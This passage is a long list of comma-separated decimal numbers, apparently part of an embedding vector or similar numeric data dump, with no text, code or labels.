010670466,-0.0065348516,-0.021840628,0.012160923,0.013441718,-0.018543592,0.00871986,0.008816193,0.02306635,-0.004451059,-0.0015877915,-0.0030173468,-0.0047869384,0.033879135,0.0027226876,0.021972004,0.013424352,0.0065871053,0.008493916,0.014904511,0.017035685,0.011607283,0.0033432425,-0.02108029,-0.012920988,-0.0030616776,0.025466828,-0.00049010955,-0.0043415106,-0.014008417,0.00084813975,-0.0001856431,0.01975775,0.008452253,0.014744003,0.003725678,0.006675154,-0.0075459783,0.012911052,0.0080876425,-0.0320846,0.0106032,-0.013067739,0.026398692,0.004734904,0.027113771,-0.006724714,-0.004784624,-0.013486656,0.013147073,-0.0068183336,-0.004816012,-0.021760833,-0.011474006,0.016358623,0.013513505,-0.0011947965,-0.009736183,-0.011926523,0.0062744156,-0.01192163,0.0047369176,-0.014718633,-0.022599442,-0.0013273152,-0.008090975,0.0020868727,0.010021866,0.029924368,-0.018913075,0.084038876,0.010223678,0.0015044413,-0.0044698515,-0.010039841,-0.0012690576,0.025275044,0.011415869,-0.0051479666,-0.014693321,-0.01611329,-0.02796803,-0.022983717,0.00995416,-0.003030025,-0.0042246818,-0.015586169,0.010362611,-0.010604715,-0.029192112,0.02877714,0.0030993912,-0.023820005,0.0010272444,0.018707652,0.0067813545,0.0121268835,-0.00059224083,-0.0069764056,-0.013596913,-0.023642391,-0.0127153,-0.010502035,-0.014964162,-0.029105736,0.010506369,-0.01718707,0.0017279923,0.00024820623,-0.00088801427,-0.0063551962,0.00033647034,-0.008930826,0.00029374307,-0.016725125,0.018970102,-0.0026614356,0.005040131,-0.001050265,0.016820947,0.004275495,0.012834184,-0.020745855,0.023273367,-0.014710523,0.011903112,0.003967249,-0.028717835,0.017613938,0.016686462,0.02105622,0.036930677,-0.022349028,0.0400256,-0.00920312,0.008491279,-0.00823643,0.0005907331,-0.016623126,0.020568646,0.006932666,0.014387732,0.00997139,0.007829828,-0.007945681,0.00968958,-0.006599394,-0.008458944,-0.0028511556,-0.0036302607,0.010452662,0.029580181,-0.0071349936,0.010789631,-0.009329663,0.0023539306,-0.002761794,0.0020668763,0.0017727409,-0.02035641,0.03024791,-0.00018425036,0.0051330444,0.0043760743,0.017806305,-0.018899117,0.004938478,-0.01877552,-0.0029316603,0.0117354775,-0.017147457,0.010494976,-0.00032171115,-0.0043154033,0.00799296,0.006787635,-0.007477524,-0.0037320664,-0.0019513495,0.023539344,-0.012656845,-0.0084560085,-0.013740194,-0.0033819592,0.0035310383,0.004285613,-0.0091575645,0.0035415322,-0.016250283,0.02633334,0.024824737,0.009491645,0.0215908,0.01330851,-0.007799656,0.028929338,-0.008514324,0.01292269,0.004378632,0.0155682,0.016058719,0.014464754,0.002619747,-0.023228973,-0.00612759,0.0010541863,-0.007979934,-0.022020955,0.014063537,-0.0042990693,-0.0150160715,-0.00036114163,0.015733175,0.0076239896,-0.0029094017,0.026310593,0.019753003,0.0072027203,-0.0005253416,-0.019303488,-0.0033586991,-0.0031020758,0.014294431,-0.015113988,0.00030225478,0.013182799,0.017257873,-0.010966651,-0.021787995,-0.01735215,0.0463035,-0.014878388,0.005348203,0.003904334,-0.022214355,-0.008044789,0.0006873238,0.08182371,-0.020350546,-0.020893082,0.0038504868,0.0030828747,-0.0066981995,-0.0077995234,0.0056612086,-0.01874891,0.0020990556,0.009515546,0.0006675208,0.019231064,0.0036648542,0.006488622,-0.017736066,0.029212847,0.0019209292,-0.0022007078,0.028241,0.0042190775,0.00021270501,-0.0018669516,-0.03356613,-0.029492365,0.0015916021,0.0061899154,0.014066159,0.0041390695,-0.014333403,-0.0010096933,0.0089810565,-0.0013905953,-0.007897009,0.0012298133,0.007900192,0.0054669296,-0.009955878,-0.013148517,0.023964427,-0.00391704,-0.004531817,0.019210586,0.023032816,0.0015171806,-0.008408112,-0.004074436,0.0032031524,0.014502814,-0.0023021526,-0.015183296,0.024150793,0.020051546,0.0033966585,-0.008722873,-0.0043205544,0.009039989,0.018919496,-0.0008625873,-0.008014333,0.00027796003,-0.00257457,-0.018967457,-0.017310757,0.006780983,-0.003316125,0.019311681,0.017879069,0.008083351,-0.0104024075,0.023595273,0.012168495,-0.0039266576,-0.011754987,0.03101188,0.0056882286,0.010795571,0.027311565,0.014059986,-0.008561521,-0.014200237,0.006545624,-0.006891255,-0.007940654,0.010830202,-0.005589046,-0.011845339,0.007273408,0.0034508987,-0.016237454,0.002285321,-0.0025750957,-0.011132589,-0.011771299,-0.0010832448,0.025277724,-0.0093174735,-0.016478837,-0.0003215243,0.004959768,-0.0239483,-0.017138518,-0.015987309,0.031060893,-0.008559694,-0.0023158,0.005959933,-0.00043530177,0.017979613,-0.015036266,0.012003158,-0.048809685,0.03127844,0.033836797,0.008390081,-0.00041612083,0.044446677,-0.008613996,0.020952191,-0.017398095,-0.0040702424,0.004619662,0.0014302603,0.006380176,-0.0020766796,0.018497957,0.005401225,-0.024145123,-0.01657181,-0.0072232634,-0.05243891,0.013694598,0.029434467,0.002805294,0.009264924,0.010739049,0.019871071,0.003482208,-0.004926028,-0.013563186,-0.02160057,0.010177868,0.016281014,0.012924788,-0.012853099,-0.013911239,0.004471322,-0.006185015,0.011941696,-0.0025930353,0.0055574514,0.009760633,0.0045638303,0.002766399,-0.0061848657,0.0018018652,0.020807048,-0.0117422445,0.008092067,-0.010670208,0.048593514,0.0022416234,0.00538371,-0.004885479,-0.0142099485,0.007632762,0.008894878,-0.013505036,0.035409924,-0.0044567585,-0.016087528,0.010079961,0.023475269,-0.01769433,-0.008288772,0.008713789,0.00030258994,0.010055721,-0.027602796,-0.01302547,0.026323747,0.0067582,0.033212565,0.017905533,0.010797266,0.008103933,0.011925102,0.009419395,0.0053941715,-0.0055642533,-0.005545859,-0.002809744,-0.022917436,0.0006870095,0.010311783,0.010474173,-0.0075554405,-0.0019457134,-0.0060931165,0.0024999883,-0.0026878375,0.0016295596,-0.0074208155,-0.017699962,0.0033300084,0.0072291815,0.0017404245,0.00095261337,-0.044395186,-0.012995773,0.0125244055,0.0061086416,-0.014685848,-0.0056761587,-0.009874517,-0.0019771208,0.011450962,-0.015446923,-0.030907357,-0.0036774415,0.026643747,-0.009648767,0.025534173,0.0006199562,-0.009153563,0.0010869117,0.02606282,0.003028773,0.012300938,0.0027255244,-0.015559901,0.00043774972,0.03349064,-0.0017392709,-0.017336177,-0.015469901,0.021138228,0.0014062213,-0.018744895,-0.0055921995,0.023344908,0.027817877,-0.008025086,-0.03273445,-0.0013008501,-0.010312501,-0.01458639,0.00032640624,-0.032155547,-0.009158033,0.0019796663,-0.00048151283,-0.020189358,0.00999902,-0.00743308,0.013399218,0.0078007407,0.0041349228,0.006963548,0.004899448,0.015319452,0.0036649308,0.001617942,-0.029381553,-0.021911593,-0.017235866,0.02940377,0.0030106113,0.01553658,-0.0016904103,-0.022871438,-0.010771623,-0.014865652,0.010703435,-0.014564782,0.0014173486,0.013756256,-0.04936294,0.019454934,0.0051201778,-0.004751391,0.0036491905,-0.011669283,-0.004647153,0.0059831534,-0.011318121,-0.031062124,-0.02724159,-0.0021155125,-0.0040559485,0.0054559107,0.000036461148,-0.03227918,0.005891475,0.012159296,0.0042133643,0.0059069768,0.01624992,0.0006225624,-0.011547083,-0.003275273,0.016083337,0.0023991093,0.021422846,-0.029278561,-0.0075681033,0.014867532,-0.003601161,0.0135148065,0.010547686,-0.022229122,0.019120887,0.0049524163,-0.03700244,0.008219778,0.014399479,-0.011860937,0.010229269,0.0017676444,-0.02394584,-0.011983283,0.014283805,0.011450229,0.027750254,0.024729226,0.026301578,0.011950588,-0.0028026653,0.0036385115,-0.0132505875,0.0075015267,0.0012944316,0.001045542,0.0034512966,0.00034752837,0.014760146,-0.01711319,0.020582313,0.011596469,0.0077337916,0.019653484,-0.014867497,0.033108003,-0.013385531,-0.030463405,-0.0017614954,-0.00996879,0.008871857,0.005004093,-0.00586377,0.01644335,0.0138904,-0.0057231593,-0.014110136,0.002146354,-0.01965674,-0.021582644,-0.010897177,-0.0088251615,-0.02021152,-0.0071616163,0.014256684,-0.032134093,0.021710178,-0.009480335,-0.001155474,0.018593477,-0.021558024,0.006977946,-0.006854756,-0.024268268,0.010048882,0.016051304,-0.002444233,-0.010584996,0.010737197,-0.0067999726,-0.0036256986,0.007946381,-0.013876825,0.031066537,-0.0056535606,0.014091507,0.010130502,0.012506,-0.014346146,-0.0018311363,-0.0028504715,-0.018150551,0.024918607,0.0017299623,-0.00814332,0.013783556,0.032065775,-0.011390592,0.010648391,-0.0046386425,0.014296396,0.03796423,0.010376222,0.006786289,-0.02318997,0.017197516,0.009736128,-0.02645791,0.02065581,0.0012639255,-0.06264424,0.019846391,-0.0023904145,0.0055583147,0.020799438,0.008617368,0.013923754,0.010892127,0.018357776,-0.010872333,0.0132072,-0.012417959,0.0018118351,-0.005539277,0.0026521238,-0.0006327115,-0.02298577,0.008156183,0.017788384,-0.0068107867,-0.0031278862,-0.004117431,0.001585452,0.0006698275,0.02396129,-0.011180718,0.010943712,-0.0046777264,-0.011145614,0.0074072788,0.003258307,0.008482624,-0.006989323,-0.004455815,0.016176166,-0.011239241,-0.007824023,0.0067602755,-0.01672771,-0.0020342292,0.00031507792,-0.004605457,-0.0061237956,0.030678937,-0.015649274,0.004731005,-0.0034935547,-0.022867065,-0.015912926,-0.031573914,0.016836584,-0.013433679,0.0139734475,0.010658796,-0.001228155,0.0014839534,-0.016336907,0.006401404,0.0029187999,0.013858582,0.00097530376,-0.00529452,-0.004027814,0.008425303,-0.024317777,-0.028336333,-0.0072499076,-0.011940905,0.015976883,0.01221308,-0.015254003,0.0038306932,0.0066112634,-0.0037347237,-0.018070212,0.016002376,-0.0015928718,-0.0088748075,-0.0034797522,-0.0046997126,0.0010822279,-0.01276419,-0.016161008,-0.000497883,-0.029480487,0.00815941,-0.0199218,0.014204231,0.005470234,-0.014826921,-0.002372585,-0.005408479,-0.0042407457,0.014034246,0.0022252612,0.008517181,0.0016170735,0.020252362,0.0042318553,0.01887227,0.024911875,-0.009770115,-0.029369906,0.035493992,-0.01945839,0.000688209,0.008438882,-0.0020467057,0.013694182,0.028928943,-0.005903479,0.0029496108,0.009949483,-0.017573198,0.010535438,-0.025548136,-0.0029420988,-0.009460316,0.042176004,0.010236198,-0.01461283,-0.01813478,0.001193611,0.0033852938,0.0029332591,-0.0010865409,0.0074474798,0.0004860567,-0.010321308,0.015816132,-0.0072301347,0.005649169,-0.015575478,-0.016394556,0.00897165,-0.010446926,0.000018117284,-0.0061344425,-0.017777992,0.006057754,-0.0071571083,-0.006654623,-0.033411685,0.002065105,0.0023953707,-0.0015935334,-0.01360976,0.019067176,-0.008496581,0.018059768,0.006535367,-0.014884818,0.00026805914,0.00014011304,0.00018652887,0.015045774,0.019146884,-0.01894045,0.014653974,0.041610844,-0.024556033,-0.017056488,0.01256326,-0.0020799192,-0.014469856,0.0017757984,-0.009775848,0.009657645,-0.010922682,0.00037206162,0.015648367,0.0076053194,-0.00576801,0.0400181,0.012229615,-0.003244434,0.012827523,0.0050703073,-0.0089687165,0.011800656,0.004763654,0.017076276,-0.00738445,0.018378926,0.02346261,-0.015031753,-0.022041986,-0.00076877297,-0.020051593,-0.017367302,-0.023932606,0.0076921927,0.005083559,0.01638546,-0.010909476,-0.0021598584,0.012613201,0.002505636,-0.004699146,0.0074141906,-0.013458789,0.01680801,0.0021997038,-0.018885951,-0.02933723,0.011762029,0.020115048,-0.02503965,0.011480159,-0.01971754,-0.02030716,-0.0042793727,-0.0046688705,0.022223745,-0.003075263,0.005471932,-0.02033727,-0.022239486,0.019418597,-0.029368846,0.013702951,0.002602739,0.0077584204,0.003597861,0.0033587466,-0.008429362,0.0102959145,0.014318529,-0.0023433953,0.0036252637,0.01446414,-0.033766717,0.014071989,0.016553491,-0.02874274,0.0043265466,-0.017155105,-0.002997135,-0.010765986,-0.005824231,0.004218747,0.0016491783,0.0110957185,0.0018598943,0.017637203,0.04254844,0.00047497728,-0.0094230715,0.007936519,0.013952055,0.0033160443,0.018410165,0.003076175,-0.006680623,0.0025357287,0.0012385079,-0.026737288,-0.0062447884,0.0020383014,-0.006441129,0.0049674306,-0.0059267045,0.0049067955,-0.0041036643,-0.00036501169,-0.008139841,0.020621816,0.013215166,-0.009918398,-0.003531649,-0.01334161,0.0016916344,0.013127477,0.0015948684,-0.007571517,-0.010396213,-0.0066598784,-0.0015930398,0.009370776,0.017931674,0.015487936,-0.005458236,0.009978718,-0.04272955,0.007923303,0.03214519,0.016417505,-0.023122367,0.02463288,-0.023031905,-0.0049770554,0.009460426,-0.014832447,0.00601961,0.01362411,-0.0065147816,-0.0021344272,-0.014560697,0.009742609,-0.017549777,0.047260206,-0.015669502,0.0009484073,-0.02263149,0.0071175457,-0.022496754,0.0157853,0.019285463,0.015123138,-0.007426858,-0.017570315,-0.02641932,0.0037105186,-0.006694399,0.011989855,0.0016459755,-0.023140775,0.00037426763,-0.012236677,0.010185426,-0.0069851098,0.004517685,0.0048244246,0.027844317,-0.004109495,0.019310199,0.025417773,-0.0051572667,-0.021202808,-0.010296679,-0.00720221,-0.011058143,-0.0025804548,0.014621167,0.006084567,0.01716748,-0.019001333,-0.00018525452,-0.023658143,0.005307019,0.019128874,-0.01093031,0.078192376,-0.0060859295,-0.0038458935,-0.0050952905,0.006482484,-0.0052988194,0.0294533,-0.01018142,0.016220119,0.0035992258,-0.005828487,-0.0018916749,0.00425277,0.014019788,-0.00022018515,0.008131305,0.0022837014,0.008243989,0.02055453,0.0044827187,-0.009715392,0.0042259726,-0.013087598,-0.017879834,0.02139634,-0.016486548,0.0047110673,-0.017791456,-0.0018990918,0.004112477,-0.016033346,-0.020197216,0.010269441,-0.0066505563,0.021511488,-0.029116977,-0.003505682,0.0028249335,-0.009308486,-0.011901631,0.029160744,0.034826703,0.017310442,-0.010405327,-0.009264312,-0.012629064,0.09716468,0.022041198,0.011909425,0.008173144,0.007491866,0.015313095,-0.010095273,0.023177475,0.0036674235,-0.0132618295,0.005647678,0.0053752908,0.0074006715,0.013906618,-0.0015202133,-0.013307741,-0.0012156947,0.0072855256,0.008260872,-0.035401754,0.004207373,0.0139478855,-0.0102645485,-0.008331754,0.0012880807,0.020016849,0.008636597,-0.009615184,-0.0018260732,-0.007352264,0.004796559,-0.0074520535,0.014834048,0.0075263516,0.005321585,-0.07932386,0.0076274225,0.24884136,0.00064807496,0.011091413,-0.012597026,-0.0025107132,-0.0031012504,-0.121687345,0.0024792785,-0.007357657,0.013735064,-0.017209386,-0.024451157,-0.014659396,0.023518628,0.008398728,0.0049892496,0.006412653,-0.02878287,0.021111123,-0.01452953,0.0059565594,0.008223802,0.011045964,-0.0021098712,-0.021837259,0.01021145,0.0199087,-0.014367416,-0.020090673,0.006927223,0.0024397797,-0.0004576636,-0.001819188,-0.013159605,-0.01662345,0.003609752,0.019212542,0.007990525,-0.016635131,-0.010269789,0.018471394,-0.0055125807,-0.016457906,-0.020585723,-0.17267996,0.0024132712,0.023440994,-0.053527564,0.02309616,-0.0023926103,0.0021713786,-0.011612079,0.011309803,0.00056680624,-0.021576611,-0.0034786048,0.005921368,0.016806608,-0.0068563344,-0.0071135596,-0.0045717536,-0.00021230716,0.0071003004,-0.0019606913,0.0007533649,0.02649911,-0.009791723,-0.009179954,0.0054668263,-0.005455443,-0.015128598,-0.00041877606,-0.013001552,0.030247634,-0.017878586,0.010352382,-0.008658872,-0.0042953854,-0.025037996,-0.018973922,-0.02539874,0.027162265,-0.00772064,-0.0035645086,-0.014677146,-0.007049486,0.007036275,-0.0048287297,0.0013191033,0.01584106,0.006963505,0.0055980054,0.011033262,-0.003355909,0.045303337,-0.020250667,-0.016535835,0.014828922,-0.007831344,0.000974236,0.0027126237,-0.010315407,-0.02448053,0.008584294,-0.009784815,-0.014958734,-0.022930084,-0.023362048,0.015387672,-0.025016423,0.0075471858,-0.021462487,-0.0021490091,0.012346076,0.005108283,0.011990115,0.0019889097,-0.025003217,0.0070611285,0.014460841,-0.01778882,-0.0043771924,0.0028215635,-0.0045691454,0.0036765772,-0.025179574,0.012056001,-0.03562596,-0.014327441,0.0029104536,-0.0021470415,0.007118415,-0.020354182,0.010044433,0.0025504117,0.023866832,0.035652768,0.019734459,-0.0044912035,0.006084385,0.008246752,0.011336658,-0.014254393,0.010417513,0.0010699533,0.019559799,-0.0037939895,0.011007478,-0.017871233,-0.0020123052,-0.023179837,-0.003516947,-0.022116045,0.008720593,-0.009818935,-0.007938982,-0.00077650556,-0.019032232,-0.014891502,-0.025047641,0.032849327,0.029711934,0.009953943,-0.01249268,-0.030847907,-0.009670146,0.007870217,0.012204797,0.041317713,-0.0027286306,-0.034218203,-0.006233293,0.01582619,-0.014068852,-0.0062483395,0.0093569495,0.003883911,0.004052774,0.009436511,0.0112442225,-0.00796828,-0.019138662,-0.0076573584,0.0044842283,-0.0053372174,-0.009076004,-0.009015607,-0.008421251,0.024756711,-0.015337253,0.018970262,-0.00735718,0.016776875,-0.015536181,-0.022034977,0.029392434,-0.010327253,-0.042750347,-0.0007762983,0.10150131,-0.0044844416,-0.011389991,0.007848048,-0.009609242,0.015674569,0.016418112,-0.011355636,-0.018350925,-0.006437042,-0.019245224,-0.017585926,-0.003987602,0.024890302,-0.028137086,0.019407341,0.0063624163,0.0068748,-0.0061641466,0.0113936355,0.009217309,-0.022225115,-0.00078984577,0.034930237,0.018286591,-0.00710564,0.012525807,0.010459901,0.000024969275,-0.00058066106,-0.024253918,-0.00340507,0.0030397065,0.0025688792,0.0033226842,-0.055716056,-0.017405484,0.009231678,0.015636647,0.019381672,0.019488655,0.005188137,0.009653547,-0.023737373,0.020404736,0.01690198,-0.0034428826,0.007068334,-0.0025443477,-0.006430675,-0.0037911562,-0.0018560315,-0.005866491,-0.021254668,-0.012568647,-0.03387728,-0.0031345652,-0.013059936,0.0071234605,0.00080210314,0.05721021,-0.0055168495,-0.012433361,-0.00016634083,-0.014977419,0.017985117,-0.008180685,-0.0009932044,0.028250048,0.029359244,0.0016988724,-0.005922536,-0.01768114,0.013033636,-0.0071927407,-0.0058185374,-0.023452811,-0.0054960935,-0.009244883,-0.00029065998,0.013975413,0.008266716,0.011936775,0.010995638,-0.01882046,-0.05688015,-0.0029604826,0.018902188,-0.028503502,0.013381604,0.0062520513,0.009467302,0.0061783236,0.011448354,0.0118314335,-0.032984953,0.0020004346,0.013077478,-0.001994984,-0.0012688512,0.009783819,0.009400806,-0.012511318,-0.0040349658,-0.011933408,-0.01738716,0.01650523,-0.006256482,-0.00992137,-0.017307505,-0.005587057,-0.016544648,0.028078277,-0.019304583,0.01268021,0.03687863,-0.022883924,-0.009000229,0.0029233398,-0.022858918,-0.016222293,-0.023793722,-0.023145152,-0.045170996,0.002151394,-0.010683165,-0.0068431986,0.0006158748,-0.028259233,0.018521726,0.008320899,0.036448345,-0.013048108,-0.0110156685,-0.004418944,-0.001570058,0.011941116,0.006327829,0.0066782627,0.0041538943,-0.0120524885,0.0031348516,-0.014994306,0.005333977,-0.015490527,0.011204061,0.012180577,0.018711314,-0.003437792,0.009654597,-0.015732462,0.00012807602,-0.0072766924,-0.001690357,0.0015283551,0.012324577,-0.025087781,-0.003318743,-0.0033107304,-0.015835634,-0.0199714,0.026224468,0.008891291,-0.023648692,-0.016648749,0.0041512637,0.037677627,-0.018082006,0.0062853172,0.0032365199,-0.016684791,-0.015707862,0.011969138,0.017442709,-0.0010789066,0.0003425093,0.016778637,-0.010261636,-0.003957324,-0.000103208644,0.016003948,0.005488581,-0.029243674,-0.007887771,0.021075096,-0.0028773784,-0.0050100833,0.017231384,-0.0029526271,-0.017416794,0.0011218927,0.018767955,0.010052453,-0.030831976,-0.014543758,-0.0035568452,0.017640032,-0.014212054,0.0146654155,0.011370353,-0.01304222,0.010812968,-0.032156665,-0.025440546,0.0040374454,0.021812474,-0.017948274,-0.0014679263,-0.014860449,0.0020505833,0.0030653686,-0.0023683733,-0.011784715,0.011345369,-0.012756352,-0.020546785,0.009492892,0.0200889,-0.011477041,-0.012781364,-0.003148736,-0.01214406,-0.013650922,-0.005795123,-0.049676947,0.006938308,-0.01611727,0.081847236,-0.010101584,-0.009726304,0.018664615,0.047154155,0.024859944,0.014327953,0.011903636,-0.012076909,-0.017226616,-0.020910563,-0.022658156,-0.0066838446,0.0064280075,-0.001787507,0.0038452258,0.015853995,0.0064037126,-0.017898012,0.0051950216,-0.012696847,0.0077589587,-0.00039347852,0.012696277,-0.005387779,-0.039214034,0.013548058,-0.00185551,-0.018416401,-0.007948602,-0.014971172,-0.0013414238,-0.009055988,-0.026579423,-0.011985833,0.0042927633,-0.0015936999,0.0010413168,-0.01021777,0.019984921,0.019399773,-0.00023791782,-0.01736879,-0.01069317,-0.013824217,0.0073737213,0.008997133,0.013157204,-0.01846566,-0.0010727099,-0.009330842,0.029816205,-0.0053294194,0.000004992541,0.00584541,0.016134694,0.006006556,-0.017943522,0.005634479,0.019050304,-0.018643955,-0.02281021,0.005735718,-0.0071291174,-0.003010018,0.015305982,-0.020803776,-0.025513688,-0.0062228893,0.007433916,-0.023552626,0.031153621,0.00018849972,0.003744955,0.004714693,-0.0100065535,0.005905653,-0.013637287,0.017226875,0.010515168,-0.001388668,0.024868293,-0.007731323,-0.0027197201,0.0025413376,0.022768853,-0.020635197,-0.021751244,0.0007345752,0.007147016,0.015936563,-0.0014493867,-0.020051392,-0.0027773327,-0.0060589775,0.0043771574,0.000319011,0.0013998532,0.0057740523,-0.02852394,0.001709722,-0.007656753,0.0019123573,-0.007017378,-0.0048482455,0.0018903934,-0.15434258,0.014243409,-0.011118703,-0.027476247,0.00242755,-0.01083354,0.027121775,0.07313793,-0.01075975,-0.041956387,0.015765203,0.021957694,0.0192345,-0.004499011,-0.0090486985,0.024538638,-0.002714971,-0.010272426,-0.013141753,0.010300455,0.00082710106,0.002886697,0.009702269,-0.003961897,-0.009734442,0.02152805,-0.005195402,0.012686905,0.003998114,0.010301267,-0.0004065333,0.004723287,0.0009998422,0.021931374,-0.005163705,0.00087654294,0.00309906,-0.0075808386,0.01330599,0.003941497,-0.0024107292,0.0066307895,-0.0024349787,0.0011824517,0.008091152,0.029500002,0.009772811,0.005492028,-0.00092583295,0.0020382737,-0.007140515,-0.0064985245,0.021544186,-0.015552821,-0.019221466,-0.00408139,-0.00087370066,0.004821522,0.013634152,-0.0076427353,-0.00056564284,0.0429856,0.0034149457,-0.019775383,-0.001984484,0.009573655,-0.0058937115,-0.007528406,-0.0077586826,-0.0070693423,-0.008584776,0.011091403,0.00810359,-0.002665316,-0.002017074,-0.0038330674,0.012159186,0.02033644,-0.010572016,0.018691644,0.001726948,0.0029206274,-0.006551897,0.014772862,0.003876217,0.008964498,0.0023740379,-0.00511954,-0.024951926,-0.002405211,0.011604571,0.0017824472,-0.019295167,-0.016718252,-0.0076774973,0.009495125,0.0056376276,0.037171423,0.011024334,-0.0068088337,-0.004723565,0.0102722505,-0.008922403,-0.003939335,-0.16503195,-0.004671977,0.022419544,-0.0043288115,-0.016916653,-0.0068178563,0.0002497414,0.010691581,0.028266722,-0.0016554908,-0.017562287,0.0066700038,0.013809782,0.0077965246,0.0009063259,-0.00092118455,-0.039272737,0.0026520633,-0.001433369,-0.012767816,0.015119882,-0.006848312,-0.022481484,0.015307435,0.010582054,-0.015560773,-0.007031589,0.017754257,0.020582503,-0.016166562,0.0051394743,-0.0016709245,-0.010854471,0.006884581,-0.023962405,-0.0026584114,0.0065969015,-0.0033874544,-0.0035627407,0.0057308306,0.025193485,-0.008837127,0.015737932,-0.0056388443,0.0029491056,-0.007420985,0.008486873,0.0077321837,0.01589886,0.010003468,0.0012936711,0.004162388,-0.0011874057,-0.0009822134,0.005209117,-0.036228552,0.009027756,-0.0054807803,-0.003334945,0.02451898,-0.025704294,0.025893217,0.0011774028,0.0031668171,-0.011032356,-0.001441182,0.014208433,-0.0021555333,0.00777026,-0.0076129735,-0.018294899,0.008187281,0.020976879,-0.0035566888,0.02296448,0.007928283,-0.002525393,0.006304022,0.020530805,-0.014165884,-0.008364163,-0.0035309829,-0.009048863,0.00910373,-0.018457785,0.0011128521,0.0011309746,0.020988002,-0.008335341,0.030324442,0.0063859704,0.016178528,-0.0060315756,0.0047457577,0.009241375,0.005201115,0.0103517175,0.004217932,0.012257141,0.0009341856,-0.035477284,-0.0050589466,-0.015620268,0.007190991,-0.0039360737,0.009460098,-0.0038127026,-0.002883073,0.010493978,0.014064891,0.0026275797,-0.0032472608,-0.012510547,0.011876146,-0.019782728,0.013376674,-0.0028784357,-0.00048488294,-0.0038583467,0.016780399,0.0024989534,0.01136029,0.00832898,-0.01841314,-0.022414975,0.009437086,0.003313098,0.016772542,0.01281004,0.00816088,0.0065561673,-0.007131625,0.021905176,-0.029965986,-0.009624735,0.00022743983,0.0058298684,-0.011177344,0.01745611,0.018520376,-0.0046808557,-0.007915073,0.0055593117,0.02687025,-0.0044052643,-0.008676357,-0.007297555,0.0056664385,-0.010996882,0.0077459947,-0.008343334,0.013745466,0.0023530615,0.006869501,-0.016877571,0.0007761113,-0.040770523,0.011627711,0.0067880545,-0.015234934,-0.009551061,-0.0008527572,0.008222139,0.0019642098,-0.011361194,0.008075068,-0.0028859852,0.005098696,-0.0033422054,-0.0037042834,-0.0058868374,-0.0031922602,0.024259249,-0.010303577,0.0029281604,0.033096626,0.022252219,0.028995028,0.012870993,0.022214048,0.016340107,0.008886112,-0.007048789,0.008047698,0.011102155,0.004551236,-0.00016274133,0.0032357157,0.0073563126,0.0004528052,0.013805786,-0.007669901,-0.0024373159,0.005119166,0.0064974157,0.00837299,-0.0054592,0.012922297,0.032221105,-0.02167441,0.0014042392,0.023416072,0.010177588,-0.009417397,0.005667024,0.008352886,0.0054158275,0.023248767,0.01696114,0.0041124993,-0.007221371,-0.0126316,0.002496125,0.0068850745,0.017416293,0.011459819,-0.006864982,-0.009553718,0.028317768,0.0061221267,0.0027902187,-0.02644811,0.009478944,-0.010886944,0.024554862,0.034801695,0.023844693,-0.0078021204,0.0034862887,-0.009095006,0.0012545481,-0.004818975,-0.0034382772,0.03041557,0.012953985,0.009317176,0.019804716,-0.006512082,0.0176775,0.021877134,0.009654501,0.021242639,0.020247754,-0.008044884,-0.005494436,-0.008754924,0.00026130103,0.009828273,-0.012511332,-0.0012145287,0.008324784,-0.0072187926,-0.0052752523,-0.008963205,-0.021834599,0.0054786275,0.026164094,-0.0202826,-0.024889737,0.01387833,-0.016863465,0.0076436987,-0.009505856,0.005420692,-0.00088807935,-0.010110474,0.01605534,-0.03087941,0.0071242,0.013564223,-0.0054238797,0.018200764,-0.0052931835,0.013347501,0.010719097,-0.013183726,-0.02936011,0.008484584,0.0029480255,0.0025871661,0.0048309313,-0.023592075,-0.002829809,0.014787612,0.003528365,0.01656587,-0.040744897,-0.005760063,0.0106884325,-0.0054041324,0.016507417,0.0029561704,-0.0004387822,-0.013094212,-0.017698808,0.01779023,0.023723647,-0.009467206,0.0017955941,-0.0021824876,0.0016130237,0.006356538,0.00058209006,0.011400182,-0.011361565,-0.009252568,0.002130894,0.006136596,0.0015198196,0.0069132308,-0.0030545339,0.018974056,-0.024199748,-0.004267256,-0.0029761635,0.007508982,-0.012024904,0.00071151444,-0.016577207,-0.014445868,-0.020831466,-0.018377025,0.030712754,-0.023879664,0.015502292,0.014826617,0.010660147,-0.006941912,0.012986614,0.0056151403,0.016294762,-0.0121664265,0.0042730574,-0.0074846162,0.007858708,-0.022170352,-0.012949339,0.022325283,0.004464926,0.013925651,0.006279775,0.014561279,0.003632946,-0.023555389,0.0115055805,-0.01016033,0.0010633087,-0.0017472559,0.0038324576,0.014924884,-0.011144567,-0.0012421773,0.0079537695,0.017504148,0.0007962169,0.0053894515,-0.0046067275,0.00550907,0.027628455,0.013184323,-0.010702389,0.011820333,-0.00057245773,-0.0061159465,-0.001539802,-0.011815681,0.0016233728,0.0046696225,-0.008296813,-0.00073630386,0.0051785246,0.0055499966,-0.018056795,-0.010331005,-0.014154579,-0.096717924,-0.0044548227,0.007195722,-0.0066264183,0.036646746,0.01411329,-0.011285198,-0.0052241515,-0.02446058,0.010747511,-0.0072810836,0.0042212782,0.0025089942,-0.010828055,0.010369531,-0.005456618,-0.0045728553,0.0011695471,0.027221743,0.005192057,0.0032143937,0.029877158,0.005201068,0.008232669,-0.009153443,-0.0040772483,-0.00157026,-0.021359252,-0.02513596,0.02129343,0.020998323,-0.0075213755,-0.011370445,0.0036210848,0.009058295,-0.017859714,0.010078076,-0.0038552803,-0.0010256432,-0.032157235,-0.015217004,0.005484954,0.025363436,-0.02853752,0.014924184,0.016599117,-0.016279241,-0.022691192,-0.02420079,-0.0061356304,0.016556062,0.0028796892,-0.0029857678,0.017476572,-0.003901826,0.010693211,0.014033247,0.0015258973,0.008134738,0.0060744686,-0.015421227,-0.006786016,0.019625941,-0.0009817958,-0.003166645,0.023708101,-0.0006626687,0.025886985,-0.02601786,0.0070269695,0.0039697425,-0.0017239641,-0.032403845,-0.0025316752,-0.0007356492,0.016062213,-0.01924528,-0.012040559,0.014797183,0.0071852137,0.008916172,0.01548807,0.010557807,0.01582819,0.0064862305,0.008481792,-0.0067538223,0.013148135,0.012003966,0.008862363,0.019479046,0.0096297385,0.008408863,-0.0031653703,0.005458809,0.011435009,-0.012973181,-0.0017680298,0.012539488,0.00797058,0.0007550302,-0.009214183,0.015767748,-0.007874839,-0.010646978,0.0070869112,-0.0066742767,0.014451538,-0.00010017333,0.016322099,-0.008217832,0.016463267,0.017047958,0.021179011,0.021661311,0.014787409,0.007233424,-0.0044691823,-0.0028642637,-0.01204908,-0.014696966,-0.026866201,-0.027284814,-0.006339989,0.009825393,0.011714129,0.012705718,-0.031674463,-0.0037884663,0.0019998706,-0.01945397,0.03605944,0.0380955